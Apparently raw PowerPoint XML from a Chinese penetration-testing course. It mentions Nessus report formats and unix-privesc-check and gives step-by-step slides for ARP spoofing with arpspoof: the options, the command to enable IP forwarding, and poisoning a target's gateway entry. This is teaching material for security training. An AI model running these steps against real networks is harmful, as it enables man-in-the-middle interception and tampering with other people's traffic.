                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>CSV</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Nessus DB</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>五种。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{798E8C5D-50E2-B94F-98BB-5B06C20798D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="658441" y="4959219"/>
            <a:ext cx="10754626" cy="1754326"/>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CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>自带的一款提权漏洞检测工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>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400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002A51"/>
              </a:solidFill>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400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>unix-privesc-check [standard|detailed]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002A51"/>
              </a:solidFill>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800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>在输出中搜索单词“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WARNING”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>。 如果你没看到，那么这个脚本没有发现任何问题</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002A51"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFA32B22-525A-F52F-A161-559E77001FF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="84222" y="22188"/>
            <a:ext cx="3115710" cy="817056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3273913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1209675"/>
            <a:ext cx="10515600" cy="1038225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>工具实施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>欺骗</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2232025"/>
            <a:ext cx="10996613" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>是一款专业的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>欺骗工具，能够直接欺骗网关，使得通过网关访问网络的电脑全被欺骗攻击。通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>欺骗，可以达到中间人嗅探和捕获数据包的目的，并替换传输中的数据。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>选项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>] host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> interface: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>指定使用的接口              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-t target:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ARP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>欺骗的目标。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>   -r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：实施双向欺骗                                </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>host:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>指定想要拦截包的主机，通常是本地网关</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23606276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bwMode="auto">
          <a:xfrm>
            <a:off x="422030" y="1210285"/>
            <a:ext cx="10515600" cy="103737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a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>工具实施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>欺骗</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本占位符 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="527537" y="2232758"/>
            <a:ext cx="7498863" cy="4351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200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>开启路由转发：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>~#echo 1 &gt; /proc/sys/net/ipv4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ip_forward</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>~#cat /proc/sys/net/ipv4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ip_forward</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>~#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>~#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>   (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>需要提前安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>告诉目标主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的网关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>IP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>地址为攻击机的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>MAC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
